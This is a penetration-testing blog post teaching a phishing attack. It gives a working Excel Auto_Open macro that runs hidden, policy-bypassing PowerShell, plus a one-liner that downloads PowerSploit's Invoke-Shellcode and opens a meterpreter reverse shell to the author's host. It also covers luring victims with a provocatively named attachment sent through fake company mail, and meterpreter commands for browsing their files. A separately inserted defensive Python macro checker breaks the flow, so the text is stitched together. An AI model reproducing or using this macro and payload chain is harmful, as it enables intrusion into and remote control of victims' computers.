Penetration Testing – Excel – The Old Trick – All things in moderation

# Penetration Testing – Excel – The Old Trick

After the previous post, I think you guys have tried some tricks with the Social Engineering Toolkit (SET). Believe me, this tool is worth trying. Today, I will show you my old trick related to social engineering. Sometimes when you get into the victim's network, you can't use ARP poisoning, I mean web-based attacks. At this point, you guys should try to inject a payload into a document and send it via a fake company mail. For example, I use an Excel macro. You guys can follow my quick tutorial to get the whole point of it.

• Firstly, you guys open Excel and put some funny information in it like this:

• Secondly, you create a macro named Auto_Open() like this:

```vb
' Auto_Open runs automatically when the workbook is opened (if macros are enabled)
Sub Auto_Open()
    Sheets("Sheet2").Visible = True
    Sheets("Sheet2").Select
    Dim strCommand As String
    ' [Base64Code] is replaced with the encoded PowerShell command from the next step
    strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]"
    Shell strCommand, 0
End Sub
```


Do you still remember how I created a meterpreter that connects back to my host? (If you guys forgot it, you can review it in this post.)
If you guys remember it, you could just encode this code with base64:

```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force
```


Your base64-encoded string is the result of that step.

You just put it in place of [Base64Code] above, and then you have finished your macro. Then save your file under this name: Hotgirl_Telephone.xls.
You know what I mean. 😀

• You send this Excel file as a mail attachment. But it has a drawback. You guys can see it here.

You guys need to use your social engineering skills to get the victim to enable the macro feature.
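From the defender's side, the macro above is a recognisable pattern: an auto-exec entry point, a Shell call, and PowerShell launched with -Exec Bypass, -Win Hidden and an -Enc argument. The following Python checker is an added example, not code from the original post; it scores VBA source for those indicators and decodes the -Enc value, which PowerShell expects as base64 of UTF-16LE text. The sample macro and its harmless placeholder encoded command are constructed.

```python
import base64
import re

# Constructed sample: a macro shaped like the one in the post. The -Enc argument is a
# harmless placeholder command, base64-encoded as UTF-16LE the way PowerShell expects.
SAMPLE_ENC = base64.b64encode("Write-Host 'placeholder'".encode("utf-16-le")).decode()
SAMPLE_VBA = f"""Sub Auto_Open()
Sheets("Sheet2").Visible = True
Dim strCommand As String
strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc {SAMPLE_ENC}"
Shell strCommand, 0
End Sub
"""
# Constructed benign macro for comparison.
BENIGN_VBA = 'Sub FormatReport()\nRange("A1").Font.Bold = True\nEnd Sub\n'

# Indicators, each worth one point; the score drives the verdict.
INDICATORS = {
    "auto-exec entry point": r"\bSub\s+(?:Auto_Open|Workbook_Open|Document_Open)\b",
    "shell execution": r"\bShell\b|WScript\.Shell",
    "powershell launch": r"powershell(?:\.exe)?",
    "execution policy bypass": r"-(?:Exec|ExecutionPolicy|ep)\s+Bypass",
    "hidden window": r"-(?:Win|WindowStyle|w)\s+Hidden",
}
ENC_ARG = re.compile(r"-(?:EncodedCommand|Enc)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(b64: str):
    """Decode a PowerShell -EncodedCommand value; return None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_vba(src: str) -> dict:
    """Score VBA source for the macro-dropper pattern and expose decoded commands."""
    findings = [name for name, pat in INDICATORS.items() if re.search(pat, src, re.I)]
    decoded = [d for d in (decode_encoded_command(m.group(1)) for m in ENC_ARG.finditer(src)) if d]
    if decoded:
        findings.append("encoded command")
    # Three or more independent indicators is treated as suspicious.
    return {"findings": findings, "decoded": decoded, "suspicious": len(findings) >= 3}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, analyse_vba(src))
```

In practice you would feed it VBA extracted from the attachment (for example with olevba) rather than the inline sample, and alert on the decoded command as well as the score.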

• After this part, everything is done. When we turn on our listener to listen on port 443,

the victim will connect back to our host.

We use this command to start interacting with our session:

sessions -i 1

And show their drives:

show_mount

List all the files on this drive:

ls

Or their currently running processes:

ps

Because I am used to Windows command lines, I use this command to change mode:

execute -f cmd.exe -i -H

And then you guys can list their files with the dir command:

dir

You could write a note.txt file as a test (you know what I mean here? 😉):

echo recovery sky > note.txt

Check that it appears:

dir

View its contents:

type note.txt

Then delete it:

del /q /f note.txt

Finally, if you want to exit this mode, type exit:

exit

And run this session in the background:

background

To select another session from your list.

Personally, I think this is enough for you guys to test the victim's computer, but always keep in mind that we do this for educational purposes. 😀